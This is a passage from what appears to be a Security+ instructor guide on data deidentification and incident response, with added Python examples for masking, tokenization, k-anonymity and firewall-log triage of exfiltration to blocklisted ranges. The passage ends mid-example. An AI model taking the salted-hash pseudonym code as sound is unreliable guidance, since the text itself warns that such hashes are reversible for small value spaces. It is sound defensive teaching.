compliance with the principle of data minimization, each process that uses personal
data should be documented. The workflow can supply evidence of why processing and
storage of a particular field or data point is required. Data minimization affects the data
retention policy. It is necessary to track how long a data point has been stored for since
it was collected and whether continued retention supports a legitimate processing
function. Another impact is on test environments, where the minimization principle
forbids the use of real data records.

Counterintuitively, the principle of minimization also includes the principle of
sufficiency or adequacy. This means that you should collect the data required for the
stated purpose in a single transaction to which the data subject can give clear consent.
Collecting additional data later would not be compliant with this principle.
Large data sets are often shared or sold between organizations and companies,
especially within the healthcare industry. Where these data sets contain PII or
PHI, steps can be taken to remove the personal or identifying information. These
deidentification processes can also be used internally, so that one group within
a company can receive data for analysis without unnecessary risks to privacy.
Deidentification methods may also be used where personal data is collected to
perform a transaction but does not need to be retained thereafter. This reduces
compliance risk when storing data by applying minimization principles. For example,
a company uses a customer's credit card number to take payment for an order. When
storing the order details, it only keeps the final four digits of the card as part of the
transaction log, rather than the full card number.

A fully anonymized data set is one where individual subjects can no longer be
identified, even if the data set is combined with other data sources. Identifying
information is permanently removed. Ensuring full anonymization and preserving the
utility of data for analysis is usually very difficult, however. Consequently,
pseudo-anonymization methods are typically used instead. Pseudo-anonymization modifies
or replaces identifying information so that reidentification depends on an alternate
data source, which must be kept separate. With access to the alternate data,
pseudo-anonymization methods are reversible.

It is important to note that given sufficient contextual information, a data subject can
be reidentified, so great care must be taken when applying deidentification methods
for distribution to different sources. A reidentification attack is one that combines a
deidentified data set with other data sources, such as public voter records, to discover
how secure the deidentification method used is.

K-anonymous information is data in which each combination of identifying attributes is
shared by at least k individuals (k being two or more). This means that the data does not
unambiguously reidentify a specific individual, but there is a significant risk of
reidentification, given the value of k. For example, if k=5, any group that can be identified
within the data set contains at least five individuals. NIST has produced an overview of
deidentification issues, in draft form at the time of writing
(csrc.nist.gov/CSRC/media/Publications/sp/800-188/draft/documents/sp800_188_draft.pdf).

Database Deidentification Methods

Show Slide(s): Database Deidentification Methods

Deidentification methods are usually implemented as part of the database
management system (DBMS) hosting the data. Sensitive fields will be tagged for
deidentification whenever a query or report is run.

Data Masking
Data masking can mean that all or part of the contents of a field are redacted,
by substituting all character strings with a fixed placeholder character, for example.
A field might be partially redacted to preserve metadata for analysis purposes. For
example, in a telephone number, the dialing prefix might be retained, but the
subscriber number redacted. Data masking can also use techniques to preserve the
original format of the field. Data masking is an irreversible deidentification technique.

Tokenization
Tokenization means that all or part of data in a field is replaced with a randomly
generated token. The token is stored with the original value on a token server or token
vault, separate to the production database. An authorized query or app can retrieve
the original value from the vault, if necessary, so tokenization is a reversible technique.
Tokenization is used as a substitute for encryption because, from a regulatory
perspective, an encrypted field is still treated as the original data: anyone holding the
key can recover it. A random token has no mathematical relationship to the value it
replaces, so a system that stores only tokens does not hold the sensitive data at all.

Aggregation/Banding
Another deidentification technique is to generalize the data, such as substituting a
specific age with a broader age band.

Hashing and Salting
A cryptographic hash produces a fixed-length string from arbitrary-length plaintext
data using an algorithm such as SHA. If the function is secure, it should not be possible
to match the hash back to a plaintext. Hashing is mostly used to prove integrity. If two
sources have access to the same plaintext, they should derive the same hash value.
Hashing is used for two main purposes within a database:

• As an indexing method to speed up searches and provide deidentified references to
records.

• As a storage method for data such as passwords where the original plaintext does
not need to be retained.

A salt is an additional value stored with the hashed data field. The purpose of salt is
to frustrate attempts to crack the hashes. It means that the attacker cannot use
precomputed tables of hashes using dictionaries of plaintexts. These tables have to be
recompiled to include the salt value.

Note that a salt stored alongside the hash only defeats precomputed tables. A field drawn
from a small value space, such as a date of birth or a telephone number, can still be
recovered by hashing every candidate value with the stored salt, so a deidentified
reference that must stay unlinkable should use a keyed hash (HMAC) with a key held apart
from the data set, in the same way that a token vault is held apart from the production
database.
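The four database deidentification methods above, together with the k-anonymity measure described earlier in this topic, are brought together in the following Python example. It is added for this edition and is not code from any DBMS product. The customer records are constructed (the card values are published test numbers, not real accounts), the token vault is an in-memory dictionary standing in for a separate token server, and the salt is a constructed constant; the k_anonymity function measures the smallest group over whatever quasi-identifiers you name, which goes slightly beyond the single-k illustration in the text.

```python
"""Database deidentification methods over a constructed customer table:
masking, tokenization with a separate vault, banding, salted hashing, and a
k-anonymity check on the result."""
import hashlib
import secrets
from collections import Counter

# Constructed records (not real people; card values are published test numbers).
RECORDS = [
    {"name": "Ana Ruiz",   "phone": "+1-415-555-0132", "card": "4111111111111111", "age": 34, "zip": "94107"},
    {"name": "Ben Okafor", "phone": "+1-415-555-0177", "card": "5500000000000004", "age": 37, "zip": "94107"},
    {"name": "Chloe Park", "phone": "+1-415-555-0101", "card": "340000000000009",  "age": 52, "zip": "94110"},
    {"name": "Dev Singh",  "phone": "+1-415-555-0144", "card": "6011000000000004", "age": 58, "zip": "94110"},
]


def mask_phone(phone: str) -> str:
    """Partial redaction: keep the dialling prefix, redact the subscriber number.
    Irreversible; the prefix remains usable as analysis metadata."""
    prefix, sep, subscriber = phone.rpartition("-")
    return prefix + sep + "X" * len(subscriber)


def mask_card(card: str) -> str:
    """Format-preserving mask: same length, only the last four digits kept."""
    return "*" * (len(card) - 4) + card[-4:]


class TokenVault:
    """Token server. The token is random, so it carries no information about
    the value; only this mapping, held apart from the production table, can
    reverse it."""

    def __init__(self) -> None:
        self._by_value = {}   # value -> token, so a repeated value gets one token
        self._by_token = {}   # token -> value

    def tokenize(self, value: str) -> str:
        if value not in self._by_value:
            token = secrets.token_hex(8)
            self._by_value[value] = token
            self._by_token[token] = value
        return self._by_value[value]

    def detokenize(self, token: str) -> str:
        return self._by_token[token]


def age_band(age: int, width: int = 10) -> str:
    """Aggregation/banding: generalize an exact age to a band such as 30-39."""
    low = (age // width) * width
    return f"{low}-{low + width - 1}"


def pseudonym(value: str, salt: bytes) -> str:
    """Salted SHA-256 reference. Two sources sharing the salt derive the same
    reference; without it, precomputed hash tables of names are useless."""
    return hashlib.sha256(salt + value.encode("utf-8")).hexdigest()[:16]


def deidentify(records: list, vault: TokenVault, salt: bytes) -> list:
    """Produce the shareable view: direct identifiers removed or transformed."""
    return [{
        "ref": pseudonym(r["name"], salt),
        "phone": mask_phone(r["phone"]),
        "card": mask_card(r["card"]),
        "card_token": vault.tokenize(r["card"]),
        "age_band": age_band(r["age"]),
        "zip": r["zip"],
    } for r in records]


def k_anonymity(rows: list, quasi_identifiers: list) -> int:
    """The k the data set actually provides: the smallest group sharing one
    combination of quasi-identifiers. A group of size 1 is a reidentification
    target as soon as an attacker has another source with those attributes."""
    groups = Counter(tuple(row[q] for q in quasi_identifiers) for row in rows)
    return min(groups.values())


if __name__ == "__main__":
    vault = TokenVault()
    shared = deidentify(RECORDS, vault, salt=b"constructed-secret-salt")
    for row in shared:
        print(row)
    print("k on (age, zip) before banding:", k_anonymity(RECORDS, ["age", "zip"]))
    print("k on (age_band, zip) after banding:", k_anonymity(shared, ["age_band", "zip"]))
```

Running the script shows the point of banding: on exact age and ZIP code every record is unique (k=1), while on age band and ZIP code every group has two members (k=2). The card token is the only field that can be reversed, and only by a caller holding the vault.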


Review Activity:
Privacy and Data Protection Controls
Answer the following questions:

1. To what data state does a trusted execution environment apply data protection?

Data in processing (data in use).

2. You take an incident report from a user trying to access a REPORT.docx file on a
SharePoint site. The file has been replaced by a REPORT.docx.QUARANTINED.txt file
containing a policy violation notice. What is the most likely cause?

This is typical of a data loss prevention (DLP) policy replacing a file involved in a policy
violation with a tombstone file.

3. You are preparing a solution overview on privacy enhancing technologies based on
CompTIA Security+ syllabus objectives. You have completed notes under the following
headings—which other report section do you need?

Data minimization, Anonymization, Pseudo-anonymization, Data masking,
Aggregation/Banding

Tokenization—replacing data with a randomly generated token from a separate token
server or vault. This allows reconstruction of the original data if combined with the
token vault.


Lesson 16
Summary

Teaching Tip: Check that students are confident about the content that has been covered. If
there is time, revisit any content examples that they have questions about. If you have used
all the available time for this lesson block, note the issues, and schedule time for a review
later in the course.

You should be able to explain the importance of data governance policies and tools to
mitigate the risk of data breaches and privacy breaches and implement security solutions
for data protection.

Guidelines for Data Privacy and Protection

Follow these guidelines for creating or improving data governance policies and
controls:

• Ensure that confidential and personal data is classified and managed using an
information life cycle model.

• Assign roles to ensure the proper management of data within the life cycle (owners,
custodians, stewards, controllers, processors, and privacy officers).

• Develop classifications for confidential and personal information, based on standard
descriptors such as public, private, sensitive, confidential, critical, proprietary, PII,
health information, financial information, and customer data.

• Make impact assessments for breach events and identify notification and reporting
requirements.

• Use a content management system that enables classification tagging of files and
records.

• Use encryption products to ensure data protection at rest, in transit, and in
processing.

• Deploy a data loss prevention system that enforces sharing and distribution policies
to files and records across different transmission mechanisms (file systems, email,
messaging, and cloud).

• When sharing personal data, ensure appropriate deidentification mechanisms are
applied, such as masking or tokenization.

Lesson 17
Performing Incident Response

LESSON INTRODUCTION

Teaching Tip: Having completed the lengthy review of systems that involve the "protect"
function, this lesson looks at the "respond" function.

From a day-to-day perspective, incident response means investigating the alerts
produced by monitoring systems and issues reported by users. This activity is guided
by policies and procedures and assisted by various technical controls.

Incident response is a critical security function and a very large part of your work as
a security professional will be taken up with it. You must be able to summarize the
phases of incident handling, utilize appropriate data sources to assist an investigation,
and apply mitigation techniques to secure the environment after an event.

Lesson Objectives
In this lesson, you will:
• Summarize incident response procedures.

• Utilize appropriate data sources for incident response.

• Apply mitigation controls.


Topic 17A
Summarize Incident Response Procedures

EXAM OBJECTIVES COVERED
4.2 Summarize the importance of policies, processes, and procedures for incident response

Teaching Tip: This topic focuses on policies and processes to give an overview of the
incident response function.

Effective incident response is governed by formal policies and procedures, setting out
roles and responsibilities for an incident response team. You must understand the
importance of following these procedures and performing your assigned role within
the team to the best of your ability.

Incident Response Process

Show Slide(s): Incident Response Process

Teaching Tip: Incident response is discussed in Network+ now, but make sure you allow time
to recap on the basic processes. Note that there are several different models for this
process, some of which conflate the tasks into fewer steps.

Incident response policy sets the resources, processes, and guidelines for dealing with
security incidents. Incident management is vital to mitigating risk. As well as controlling
the immediate or specific threat to security, effective incident management preserves
an organization's reputation.

Incident response follows a well-structured process, such as that set out in the NIST
Computer Security Incident Handling Guide special publication (nvlpubs.nist.gov/
nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf). The following are the principal
stages in an incident response life cycle:

1. Preparation—make the system resilient to attack in the first place. This includes
hardening systems, writing policies and procedures, and setting up confidential
lines of communication. It also implies creating incident response resources and
procedures.

2. Identification—from the information in an alert or report, determine whether
an incident has taken place, assess how severe it might be (triage), and
notify stakeholders.

3. Containment—limit the scope and magnitude of the incident. The principal aim
of incident response is to secure data while limiting the immediate impact on
customers and business partners.

4. Eradication—once the incident is contained, remove the cause and restore the
affected system to a secure state by applying secure configuration settings and
installing patches.

5. Recovery—with the cause of the incident eradicated, the system can be
reintegrated into the business process that it supports. This recovery phase may
involve restoration of data from backup and security testing. Systems must be
monitored more closely for a period to detect and prevent any reoccurrence
of the attack. The response process may have to iterate through multiple
phases of identification, containment, eradication, and recovery to effect a
complete resolution.

Lesson 17: Performing Incident Response | Topic 17A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 457

6. Lessons learned—analyze the incident and responses to identify whether
procedures or systems could be improved. It is imperative to document the
incident. The outputs from this phase feed back into a new preparation phase in
the cycle.

Incident response is likely to require coordinated action and authorization from several
different departments or managers, which adds further levels of complexity.

Phases in incident response.

Cyber Incident Response Team

Show Slide(s): Cyber Incident Response Team

Preparing for incident response means establishing the policies and procedures
for dealing with security breaches and the personnel and resources to implement
those policies.

One of the first challenges lies in defining and categorizing types of incidents. An
incident is generally described as an event where security is breached or there is an
attempted breach. NIST describes an incident as "the act of violating an explicit or
implied security policy." In order to identify and manage incidents, you should develop
some method of reporting, categorizing, and prioritizing them (triage), in the same way
that troubleshooting support incidents can be logged and managed.

As well as investment in appropriate detection and analysis software, incident
response requires expert staffing. Large organizations will provide a dedicated team as
a single point of contact for the notification of security incidents. This team is variously
described as a cyber incident response team (CIRT), computer security incident
response team (CSIRT), or computer emergency response team (CERT). Incident
response might also involve or be wholly located within a security operations center
(SOC). However it is set up, the team needs a mixture of senior management decision
makers (up to director level) who can authorize actions following the most serious
incidents, managers, and technicians who can deal with minor incidents on their own
initiative.

Another important consideration is availability. Incident response will typically require
24/7 availability, which will be expensive to provide. It is also worth considering that
members of the CIRT should be rotated periodically to preclude the possibility of
infiltration. For major incidents, expertise and advice from other business divisions will
also need to be called upon:

• Legal—it is important to have access to legal expertise, so that the team can
evaluate incident response from the perspective of compliance with laws and
industry regulations. It may also be necessary to liaise closely with law enforcement
professionals, and this can be daunting without expert legal advice.


• Human Resources—incident prevention and remediation actions may affect
employee contracts, employment law, and so on. Incident response requires the
right to intercept and monitor employee communications.

• Marketing—the team is likely to require marketing or public relations input, so that
any negative publicity from a serious incident can be managed.

Some organizations may prefer to outsource some of the CIRT functions to third-party
agencies by retaining an incident response provider. External agents are able to deal
more effectively with insider threats.

Communication Plan and Stakeholder Management

Show Slide(s): Communication Plan and Stakeholder Management

Incident response policies should establish clear lines of communication, both for
reporting incidents and for notifying affected parties as the management of an incident
progresses. It is vital to have essential contact information readily available.
You must prevent the inadvertent release of information beyond the team authorized
to handle the incident. Status and event details should be circulated on a need-to-know
basis and only to trusted parties identified on a call list.

Communication Plan
Secure communication between the trusted parties of the CIRT is essential for
managing incidents successfully. It is imperative that adversaries not be alerted to
detection and remediation measures about to be taken against them. It may not be
appropriate for all members of the CSIRT to be informed about all incident details.
The team requires an out-of-band (or off-band) communication method that cannot
be intercepted. Using corporate email or VoIP runs the risk that the adversary will
be able to intercept communications. One obvious method is cell phones, but these
only support voice and text messaging. For file and data exchange, there should
be a messaging system with end-to-end encryption, such as Off-the-Record (OTR),
Signal, or WhatsApp, or an external email system with message encryption (S/MIME
or PGP). These need to use digital signatures and encryption keys from a system
that is completely separate from the identity management processes of the network
being defended.

Stakeholder Management
Trusted parties might include both internal and external stakeholders. It is not helpful
for an incident to be publicized in the press or through social media outside of planned
communications. Ensure that parties with privileged information do not release this
information to untrusted parties, whether intentionally or inadvertently.
You need to consider obligations to report the attack. It may be necessary to inform
affected parties during or immediately after the incident so that they can perform their
own remediation. It may be necessary to report to regulators or law enforcement. You
also need to consider the marketing and PR impact of an incident. This can be highly
damaging and you will need to demonstrate to customers that security systems have
been improved.
Incident Response Plan
Show Slide(s): Incident Response Plan

Teaching Tip: Contrast specific IRPs with the general processes of incident response.

An incident response plan (IRP) lists the procedures, contacts, and resources
available to responders for various incident categories. The CSIRT should develop
profiles or scenarios of typical incidents (DDoS attack, virus/worm outbreak, data
exfiltration by an external adversary, data modification by an internal adversary, and
so on). This will guide investigators in determining priorities and remediation plans. A
playbook (or runbook) is a data-driven standard operating procedure (SOP) to assist
junior analysts in detecting and responding to specific cyberthreat scenarios, such as
phishing attempts, SQL injection, data exfiltration, connection to a blacklisted IP range,
and so on. The playbook starts with a SIEM report and query designed to detect the
incident and identifies the key detection, containment, and eradication steps to take.

Incident categories and definitions ensure that all response team members and other
organizational personnel all have a common base of understanding of the meaning
of terms, concepts, and descriptions. The categories, types, and definitions might vary
according to industry. For a listing of the US federal agency incident categories, you
can visit us-cert.cisa.gov/sites/default/files/publications/Federal_Incident_Notification_Guidelines.pdf.
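The detection and triage stages of a playbook for the "connection to a blacklisted IP range" scenario mentioned above are shown in the following Python example. It is added for this edition and is not taken from any SIEM product or vendor playbook. The firewall log lines, the blocklisted ranges (documentation prefixes), the severity thresholds, and the playbook steps attached to each severity are all constructed assumptions; the query logic (allowed connections to a hostile range, grouped by internal host, ranked by bytes sent) is the part a real SIEM report would carry.

```python
"""Playbook detection and triage for the scenario "connection to a blacklisted
IP range": run the detection query over firewall log lines, then rank the hits
and attach the next steps from the playbook."""
import ipaddress
import re
from collections import defaultdict

# Hypothetical blocklist from threat intelligence (documentation prefixes).
BLOCKLIST = [ipaddress.ip_network(n) for n in ("203.0.113.0/24", "198.51.100.0/25")]

# Constructed log lines in a simplified key=value firewall format.
SAMPLE_LOG = """\
ts=2021-08-30T10:01:02Z src=10.0.0.5 dst=93.184.216.34 dport=443 action=allow bytes=1520
ts=2021-08-30T10:02:10Z src=10.0.0.5 dst=203.0.113.77 dport=4444 action=allow bytes=2097152
ts=2021-08-30T10:03:44Z src=10.0.0.9 dst=198.51.100.200 dport=443 action=allow bytes=900
ts=2021-08-30T10:04:51Z src=10.0.0.7 dst=198.51.100.10 dport=53 action=deny bytes=0
ts=2021-08-30T10:05:00Z src=10.0.0.5 dst=203.0.113.77 dport=4444 action=allow bytes=3145728
"""

LINE_RE = re.compile(r"ts=(\S+) src=(\S+) dst=(\S+) dport=(\d+) action=(\w+) bytes=(\d+)")

# Hypothetical playbook steps keyed by severity.
PLAYBOOK = {
    "high": ["contain: isolate the host from the network",
             "preserve evidence: capture memory and disk images",
             "eradicate: remove persistence or reimage",
             "recover: restore from a known-good state and monitor for recurrence"],
    "medium": ["identify the process that opened the connection",
               "block the destination at the egress firewall",
               "escalate if volume or frequency grows"],
    "low": ["confirm the egress deny rule is intact",
            "check the host for repeated beaconing attempts"],
}


def parse(log: str):
    """Yield one event per well-formed line; malformed lines are skipped."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, src, dst, dport, action, nbytes = m.groups()
            yield {"ts": ts, "src": src, "dst": ipaddress.ip_address(dst),
                   "dport": int(dport), "action": action, "bytes": int(nbytes)}


def is_blocklisted(addr: ipaddress.IPv4Address) -> bool:
    return any(addr in net for net in BLOCKLIST)


def detect(log: str) -> dict:
    """The SIEM query: traffic to blocklisted ranges, grouped by internal host.
    Denied attempts are kept as context but do not open an incident alone."""
    hits = defaultdict(lambda: {"allowed": 0, "denied": 0, "bytes_out": 0, "dsts": set()})
    for ev in parse(log):
        if not is_blocklisted(ev["dst"]):
            continue
        h = hits[ev["src"]]
        if ev["action"] == "allow":
            h["allowed"] += 1
            h["bytes_out"] += ev["bytes"]
            h["dsts"].add(str(ev["dst"]))
        else:
            h["denied"] += 1
    return dict(hits)


def triage(hits: dict) -> list:
    """Rank by severity. Bytes sent to the hostile range drive priority, since a
    large transfer suggests exfiltration rather than a single beacon."""
    order = ("high", "medium", "low")
    out = []
    for host, h in hits.items():
        if h["allowed"] == 0:
            sev = "low"
        elif h["bytes_out"] >= 1_000_000:
            sev = "high"
        else:
            sev = "medium"
        out.append({"host": host, "severity": sev, "bytes_out": h["bytes_out"],
                    "dsts": sorted(h["dsts"]), "next_steps": PLAYBOOK[sev]})
    return sorted(out, key=lambda r: order.index(r["severity"]))


if __name__ == "__main__":
    for record in triage(detect(SAMPLE_LOG)):
        print(record["severity"].upper(), record["host"], record["bytes_out"], record["dsts"])
```

On the sample data the host 10.0.0.5 is ranked high (over 5 MB sent to 203.0.113.77 on a nonstandard port), 10.0.0.7 is ranked low (its attempt was denied at egress), and 10.0.0.9 does not appear at all because 198.51.100.200 lies outside the blocklisted /25. A playbook's value is in making those distinctions before a junior analyst picks up the alert, not in the query itself.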
One challenge in incident management is to allocate resources efficiently. This means
that identified incidents must be assessed for severity and prioritized for remediation.
There are several factors that can affect this process:

• Data integrity—the most important factor in prioritizing incidents will often be the
value of data that is at risk.

• Downtime—another very important factor is the degree to which an incident
disrupts business processes. An incident can either degrade (reduce performance)
or interrupt (completely stop) the availability of an asset, system, or business
process. If you have completed an asset inventory and a thorough risk assessment
of business processes (showing how assets and computer systems assist each
process), then you can easily identify critical processes and quantify the impact of
an incident in terms of the cost of downtime.

• Economic/publicity—both data integrity and downtime will have important economic effects, both in the short term and the long term. Short-term costs involve incident response itself and lost business opportunities. Long-term economic costs may involve damage to reputation and market standing.

• Scope—the scope of an incident (broadly the number of systems affected) is not a direct indicator of priority. A large number of systems might be infected with a type of malware that degrades performance, but is not a data breach risk. This might even be a masking attack as the adversary seeks to compromise data on a single database server storing top secret information.

• Detection time—research has shown that the existence of more than half of data breaches are not detected for weeks or months after the intrusion occurs, while in a successful intrusion data is typically breached within minutes. This demonstrates that the systems used to search for intrusions must be thorough and the response to detection must be fast.

• Recovery time—some incidents require lengthy remediation as the system changes required are complex to implement. This extended recovery period should trigger heightened alertness for continued or new attacks.

Cyber Kill Chain Attack Framework
Show Slide(s): Cyber Kill Chain Attack Framework
Teaching Tip: Relate the use of attack frameworks to the creation of effective scenario-based incident response plans.

Effective incident response depends on threat intelligence. Threat research provides insight into adversary tactics, techniques, and procedures (TTPs). Insights from threat research can be used to develop specific tools and playbooks to deal with event scenarios. A key tool for threat research is a framework to use to describe the stages of an attack. These stages are often referred to as a cyber kill chain, following the influential white paper Intelligence-Driven Computer Network Defense commissioned by Lockheed Martin (lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/LM-White-Paper-Intel-Driven-Defense.pdf).

Lesson 17: Performing Incident Response | Topic 17A


Stages in the kill chain.

The Lockheed Martin kill chain identifies the following phases:

1. Reconnaissance—in this stage the attacker determines what methods to use to complete the phases of the attack and gathers information about the target's personnel, computer systems, and supply chain.

2. Weaponization—the attacker couples payload code that will enable access with exploit code that will use a vulnerability to execute on the target system.

3. Delivery—the attacker identifies a vector by which to transmit the weaponized code to the target environment, such as via an email attachment or on a USB drive.

4. Exploitation—the weaponized code is executed on the target system by this mechanism. For example, a phishing email may trick the user into running the code, while a drive-by download would execute on a vulnerable system without user intervention.

5. Installation—this mechanism enables the weaponized code to run a remote access tool and achieve persistence on the target system.

6. Command and control (C2 or C&C)—the weaponized code establishes an outbound channel to a remote server that can then be used to control the remote access tool and possibly download additional tools to progress the attack.

7. Actions on objectives—in this phase, the attacker typically uses the access he has achieved to covertly collect information from target systems and transfer it to a remote system (data exfiltration). An attacker may have other goals or motives, however.

Other Attack Frameworks
Show Slide(s): Other Attack Frameworks

Other types of attack framework have been implemented to provide a means of categorizing features of adversary behaviors to make it easier to identify indicators of such attacks.

MITRE ATT&CK
As an alternative to the life cycle analysis implied by a kill chain, the MITRE Corporation's Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK) matrices provide access to a database of known TTPs. This freely available resource (attack.mitre.org) tags each technique with a unique ID and places it in one or more tactic categories, such as initial access, persistence, lateral movement, or command and control. The sequence in which attackers may deploy any given tactic category is not made explicit. This means analysts must interpret each attack life cycle from local evidence. The framework makes TTPs used by different adversary groups directly comparable, without assuming how any particular adversary will run a campaign at a strategic level.

There is a matrix for enterprise, which can also be viewed as TTPs directed against Linux, macOS, and Windows hosts, and a second matrix for mobile. For example, Drive-by Compromise is given the ID T1189 and categorized as an Initial Access tactic that can target Windows, Linux, and macOS hosts. Clicking through to the page accesses information about detection methods, mitigation methods, and examples of historic uses and analysis.

The Diamond Model of Intrusion Analysis

The Diamond Model of Intrusion Analysis suggests a framework to analyze an intrusion event by exploring the relationships between four core features: adversary, capability, infrastructure, and victim. These four features are represented by the four vertices of a diamond shape. Each event may also be described by meta-features, such as date/time, kill chain phase, result, and so on. Each feature is also assigned a confidence level (C), indicating data accuracy or the reliability of a conclusion or assumption assigned to the value by analysis.

Intrusion event represented in the Diamond Model. (Image released to public domain by Sergio Caltagirone, Andrew Pendergast, and Christopher Betz [activeresponse.org/wp-content/uploads/2013/07/diamond.pdf].)

Incident Response Exercises
Show Slide(s): Incident Response Exercises

The procedures and tools used for incident response are difficult to master and execute effectively. You do not want to be in the situation where first-time staff members are practicing them in the high-pressure environment of an actual incident. Running test exercises helps staff develop competencies and can help to identify deficiencies in the procedures and tools. Training on specific incident response scenarios can use three forms:
• Tabletop—this is the least costly type of training. The facilitator presents a scenario and the responders explain what action they would take to identify, contain, and eradicate the threat. The training does not use computer systems. The scenario data is presented as flashcards.


• Walkthroughs—in this model, a facilitator presents the scenario as for a tabletop exercise, but the incident responders demonstrate what actions they would take in response. Unlike a tabletop exercise, the responders perform actions such as running scans and analyzing sample files, typically on sandboxed versions of the company's actual response and recovery tools.

• Simulations—a simulation is a team-based exercise, where the red team attempts an intrusion, the blue team operates response and recovery controls, and a white team moderates and evaluates the exercise. This type of training requires considerable investment and planning.

Members of Kentucky and Alabama National and Air Guard participating in a simulated network attack exercise. (Image: Kentucky National Guard.)

MITRE have published a white paper that discusses preparing and facilitating incident response exercises (mitre.org/sites/default/files/publications/pr_14-3929-cyber-exercise-playbook.pdf).

Incident Response, Disaster Recovery, and Retention Policy
Show Slide(s): Incident Response, Disaster Recovery, and Retention Policy
Teaching Tip: We will return to these topics in detail later in the course, so at this point just contrast these activities with incident response.

Incident response fits into overall planning for enterprise risk management and cybersecurity resilience.

Incident Response versus Disaster Recovery and Business Continuity

You should distinguish specific incident response planning from other types of planning for disaster recovery and business continuity:
• Disaster recovery plan—a disaster can be seen as a special class of incident where the organization's primary business function is disrupted. Disaster recovery requires considerable resources, such as shifting processing to a secondary site. Disaster recovery will involve a wider range of stakeholders than less serious incidents.


• Business continuity plan (BCP)—this identifies how business processes should deal with both minor and disaster-level disruption. During an incident, a system may need to be isolated. Continuity planning ensures that there is processing redundancy supporting the workflow, so that when a server is taken offline for security remediation, processing can failover to a separate system. If systems do not have this sort of planned resilience, incident response will be much more disruptive.

• Continuity of Operation Planning (COOP)—this terminology is used for government facilities, but is functionally similar to business continuity planning. In some definitions, COOP refers specifically to backup methods of performing mission functions without IT support.

Incident Response, Forensics, and Retention Policy


The incident response process emphasizes containment, eradication, and recovery.
These aims are not entirely compatible with forensics. Digital forensics describes
techniques to collect and preserve evidence that demonstrate that there has been no
tampering or manipulation. Forensics procedures are detailed and time-consuming,
where the aims of incident response are usually urgent. If an investigation must use
forensic collection methods so that evidence is retained, this must be specified early in
the response process.
Retention policy is also important for retrospective incident handling, or threat
hunting. A retention policy for historic logs and data captures sets the period over
which these are retained. You might discover indicators of a breach months or years
after the event. Without a retention policy to keep logs and other digital evidence, it will
not be possible to make any further investigation.


Review Activity:
Incident Response Procedures
Answer the following questions:

1. What are the six phases of the incident response life cycle?

Preparation, Identification, Containment, Eradication, Recovery, and Lessons Learned.

2. True or false? It is important to publish all security alerts to all members of staff.

False—security alerts should be sent to those able to deal with them at a given level of security awareness and on a need-to-know basis.

3. You are providing security consultancy to assist a company with improving incident response procedures. The business manager wants to know why an out-of-band contact mechanism for responders is necessary. What do you say?

The response team needs a secure channel to communicate over without alerting the threat actor. There may also be availability issues with the main communication network, if it has been affected by the incident.

4. Which attack framework provides descriptions of specific TTPs?

MITRE's ATT&CK framework.

5. Your consultancy includes a training segment. What type of incident response exercise will best represent a practical incident handling scenario?

A simulation exercise creates an actual intrusion scenario, with a red team performing the intrusion and a blue team attempting to identify, contain, and eradicate it.


Topic 17B
Utilize Appropriate Data Sources for Incident Response

EXAM OBJECTIVES COVERED
4.3 Given an incident, utilize appropriate data sources to support an investigation

Teaching Tip: Keeping the incident response objectives and content examples together involves revisiting SIEM and log data. Where we previously focused on log collection, the focus here is on reporting from the SIEM and selecting appropriate and useful data sources.

Security monitoring produces a very large amount of data, and automated detection systems can generate a large volume of alerts. Prioritizing and investigating the most urgent events as incidents and resolving them quickly is a significant challenge for all types of organization. As a security professional, you must be able to utilize appropriate data sources to perform incident identification as efficiently as possible.

Incident Identification
Show Slide(s): Incident Identification
Teaching Tip: Make sure students understand the "day-to-day" of incident identification and alerting.

Identification is the process of collating events and determining whether any of them should be managed as incidents or as possible precursors to an incident; that is, an event that makes an incident more likely to happen. There are multiple channels by which events or precursors may be recorded:
• Using log files, error messages, IDS alerts, firewall alerts, and other resources to establish baselines and identifying those parameters that indicate a possible security incident.
• Comparing deviations to established metrics to recognize incidents and their scopes.
• Manual or physical inspections of site, premises, networks, and hosts.
• Notification by an employee, customer, or supplier.

• Public reporting of new vulnerabilities or threats by a system vendor, regulator, the media, or other outside party.

It is wise to provide for confidential reporting so that employees are not afraid to
report insider threats, such as fraud or misconduct. It may also be necessary to use an
"out-of-band" method of communication so as not to alert the intruder that his or her
attack has been detected.

First Responder
When a suspicious event is detected, it is critical that the appropriate person on the CIRT be notified so that they can take charge of the situation and formulate the appropriate response. This person is referred to as the first responder. This means that employees at all levels of the organization must be trained to recognize and respond appropriately to actual or suspected security incidents. A good level of security awareness across the whole organization will reduce the incidence of false positives and negatives. For the most serious incidents, the entire CIRT may be involved in formulating an effective response.

Lesson 17: Performing Incident Response | Topic 17B


Analysis and Incident Identification

When notification has taken place, the CIRT or other responsible person(s) must analyze the event to determine whether a genuine incident has been identified and what level of priority it should be assigned. Analysis will depend on identifying the type of incident and the data or resources affected (its scope and impact). At this point, the incident management database should have a record of the event indicators, the nature of the incident, its impact, and the incident investigator responsible. The next phase of incident management is to determine an appropriate response.

Security and Information Event Management
Show Slide(s): Security and Information Event Management

Coupled with an attack framework, notification will provide a general sense of where to look for or expect indicators of malicious activity. Incident analysis is greatly facilitated by a security information and event management (SIEM) system. A SIEM parses network traffic and log data from multiple sensors, appliances, and hosts and normalizes the information to standard field types.

Correlation
The SIEM can then run correlation rules on indicators extracted from the data sources to detect events that should be investigated as potential incidents. You can also filter or query the data based on the type of incident that has been reported.

Correlation means interpreting the relationship between individual data points to diagnose incidents of significance to the security team. A SIEM correlation rule is a statement that matches certain conditions. These rules use logical expressions, such as AND and OR, and operators, such as == (matches), < (less than), > (greater than), and in (contains). For example, a single user logon failure is not a condition that should raise an alert. Multiple user logon failures for the same account, taking place within the space of one hour, is more likely to require investigation and is a candidate for detection by a correlation rule.

Error.LogonFailure > 3 AND LogonFailure.User AND Duration < 1 hour
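The pseudo-rule above implemented as a sliding-window check over normalized events, as an added example that is not code from the guide or from any SIEM product: the event records, field names and timestamps are constructed for illustration, and only the threshold (more than 3) and the one-hour window are taken from the rule.

```python
"""Sliding-window correlation for repeated logon failures, modelled on the
pseudo-rule in the text: more than 3 LogonFailure events for the same user
inside one hour. Added example; the normalized event records below are
constructed, not exported from a real SIEM."""
from collections import defaultdict
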